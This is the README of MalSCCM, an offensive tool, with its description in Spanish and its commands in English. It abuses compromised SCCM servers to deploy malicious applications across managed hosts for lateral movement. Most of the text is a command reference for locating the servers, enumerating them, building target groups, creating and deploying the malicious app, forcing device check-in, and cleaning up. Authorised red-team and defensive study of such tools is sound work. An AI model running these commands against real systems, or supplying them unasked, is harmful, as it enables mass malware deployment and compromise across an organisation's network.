
Abusar de servidores SCCM para implementar aplicaciones maliciosas en hosts administrados para movimiento lateral y operaciones de equipos rojos.
Esta herramienta te permite abusar de servidores SCCM locales o remotos para implementar aplicaciones maliciosas en los hosts que administran. Para usar esta herramienta, tu proceso actual debe tener derechos de administrador sobre el servidor SCCM.
Normalmente, las implementaciones de SCCM tendrán el servidor de administración y el servidor primario en el mismo host, en cuyo caso el host devuelto por el comando locate se puede usar como servidor primario.
Si ese no es el caso, deberás comprometer el host de administración devuelto con locate para luego ejecutar locate nuevamente en ese host y obtener el nombre del servidor primario. Una vez que tengas eso y acceso de administrador, ¡estás listo!
Un enorme crédito a PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) en el que se basa todo esto; esto no se habría logrado sin el trabajo de @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
Commands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>